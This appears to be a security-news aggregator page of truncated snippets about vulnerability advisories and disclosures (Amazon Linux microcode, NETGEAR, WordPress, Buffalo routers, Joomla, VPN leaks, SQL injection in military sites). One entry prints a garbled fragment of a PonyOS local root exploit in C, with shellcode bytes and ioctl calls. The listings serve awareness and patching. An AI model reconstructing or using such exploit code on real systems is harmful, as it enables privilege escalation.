Amazon Linux 2023 : microcode_ctl (ALAS2023-2025-1189)

It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2025-1189 advisory. A potential security vulnerability in some Intelr Processors may allow information disclosure. Intel is releasing microcode updates and prescriptive guidance to mitigate this potential...

CVE-2017-18789

Certain NETGEAR devices are affected by disclosure of sensitive information. This affects R6250 before V1.0.4.8, R6400 before V1.0.1.22, R6400v2 before V1.0.2.32, R7100LG before V1.0.0.32, R7300 before V1.0.0.52, R8300 before V1.0.2.94, R8500 before V1.0.2.100, D6220 before V1.0.0.28, D6400 befor...

Wordfence Intelligence Weekly WordPress Vulnerability Report (April 7, 2025 to April 13, 2025)

In case you missed it, Wordfence just published itsannual WordPress security report for 2024. Read it now to learn more about the evolving risk landscape of WordPress so you can keep your sites protected in 2025 and beyond. Last week, there were 352 vulnerabilities disclosed in 310 WordPress...

Multiple vulnerabilities in Buffalo broadband routers

Overview Multiple broadband routers provided by BUFFALO INC. contain multiple vulnerabilities listed below. Disclosure of sensitive information to an unauthorized user CWE-200 - CVE-2021-3511 Improper access control CWE-284 - CVE-2021-3512 Chuya Hayakawa of 00One, Inc. reported this vulnerability...

Joomla! 3.1.x < 3.8.0 Multiple Vulnerabilities

According to its self-reported version number, the detected Joomla! application is affected by multiple vulnerabilities : - A flaw exists related to SQL query handling that allows disclosure of article introduction text when such articles are in the archived state. Note that only versions 3.7.0...

Warning – 3 Popular VPN Services Are Leaking Your IP Address

Researchers found critical vulnerabilities in three popular VPN services that could leak users' real IP addresses and other sensitive data. VPN, or Virtual Private Network, is a great way to protect your daily online activities that work by encrypting your data and boosting security, as well as...

PonyOS 3.0 tty ioctl() Privilege Escalation

Exploit Title: PonyOS include include int main struct winsize ws; printf"+ PonyOS = 3.0 ioctl local root exploit\n"; memcpy&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8; ioctl0, TIOCSWINSZ, &ws; ioctl0, TIOCGWINSZ, void 0x0010f101; printf"- patched syssetuid\n"; asm"movl $0x18,%eax"; asm"xorl...

Hacker discloses vulnerabilities in dozens of Military and Pentagon websites

A hacker with handle name !White! today disclose SQL injection vulnerabilities in dozens of Military, United Nation and Pentagon domains. SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. Through a Pastebin note hacker announce more details...